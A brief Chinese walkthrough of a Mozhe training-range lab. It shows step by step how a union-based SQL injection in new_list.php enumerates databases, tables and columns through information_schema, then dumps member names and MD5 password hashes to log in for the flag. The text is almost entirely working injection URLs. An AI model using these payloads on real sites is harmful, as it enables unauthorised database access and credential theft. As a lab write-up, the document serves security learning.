墨者學習
By/shy014
地址:https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe
1.登陸墨者靶場,選擇該靶機,啓用靶機
2.進入靶場發現熟悉的通告
3.測試存在SQL注入漏洞
http://219.153.49.228:45391/new_list.php?id=1%20and%201=2
4.判斷列
http://219.153.49.228:45391/new_list.php?id=1%20order%20by%204
5.判斷回顯位置
http://219.153.49.228:45391/new_list.php?id=-1%20union%20select%201,2,3,4
6.確定當前用戶名和數據庫
http://219.153.49.228:45391/new_list.php?id=-1%20union%20select%201,database(),user(),4
7.讀取庫名
http://219.153.49.228:45391/new_list.php
?id=-1 union select 1,group_concat(schema_name),3,4 from information_schema.schemata--+
8.讀取表名
http://219.153.49.228:45391/new_list.php
?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='sys'--+
這張表不是
http://219.153.49.228:45391/new_list.php
?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'--+
9.讀取字段
http://219.153.49.228:45391/new_list.php
?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'--+
10.讀取內容
http://219.153.49.228:45391/new_list.php
?id=-1 union select 1,group_concat(id,name,password,status),3,4 from StormGroup_member--+
http://219.153.49.228:45391/new_list.php
?id=-1 union select 1,group_concat(id,name,password),3,4 from StormGroup_member--+
11.MD5解密
12.登陸獲取key
